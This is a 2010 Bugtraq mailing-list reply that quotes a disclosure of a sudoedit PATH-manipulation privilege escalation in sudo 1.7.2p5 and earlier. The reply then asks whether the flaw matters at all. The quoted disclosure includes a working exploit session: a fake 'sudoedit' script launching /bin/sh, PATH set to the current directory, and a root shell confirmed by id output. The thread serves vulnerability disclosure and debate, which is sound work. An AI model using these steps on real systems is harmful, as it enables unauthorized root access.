Bugtraq mailing list archives
Re: sudoedit local privilege escalation through PATH manipulation
From: Ansgar Wiechers <bugtraq () planetcobalt net>
Date: Tue, 20 Apr 2010 08:42:32 +0200
On 2010-04-19 Agazzini Maurizio wrote:
1. Abstract. While writing an article about the vulnerability outlined in CVE-2010-0426, we found a distinct security flaw, also related to the sudoedit pseudo-command. Specifically, the path component of sudoedit is not checked correctly. This can be easily exploited by a local user with permission to run sudoedit, in order to execute arbitrary commands as root. 2. Example Attack Session. inode@pandora:~$ echo "/bin/sh" > sudoedit inode@pandora:~$ /usr/bin/chmod +x sudoedit inode@pandora:~$ id uid=1000(inode) gid=100(users) groups=100(users) inode@pandora:~$ export PATH=. inode@pandora:~$ /usr/bin/sudo sudoedit /etc/hosts Password: sh-3.1# /usr/bin/id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel), 11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev), 84(power),86(netdev),93(scanner) sh-3.1# 3. Affected Platforms. All vendors supporting sudo <= 1.7.2p5 are affected. Exploitation of this vulnerability requires that the /etc/sudoers file be configured to allow the attacker to run sudoedit.
Perhaps I'm missing something, but how is this a security flaw? A user who is allowed to run "sudoedit" can edit /etc/sudoers, and thus allow himself to run any command anyway. Regards Ansgar Wiechers -- "All vulnerabilities deserve a public fear period prior to patches becoming available." --Jason Coombs on Bugtraq
Current thread:
- sudoedit local privilege escalation through PATH manipulation Agazzini Maurizio (Apr 19)
- Re: sudoedit local privilege escalation through PATH manipulation Ansgar Wiechers (Apr 20)
- Re: sudoedit local privilege escalation through PATH manipulation Agazzini Maurizio (Apr 22)
- Re: sudoedit local privilege escalation through PATH manipulation Ansgar Wiechers (Apr 20)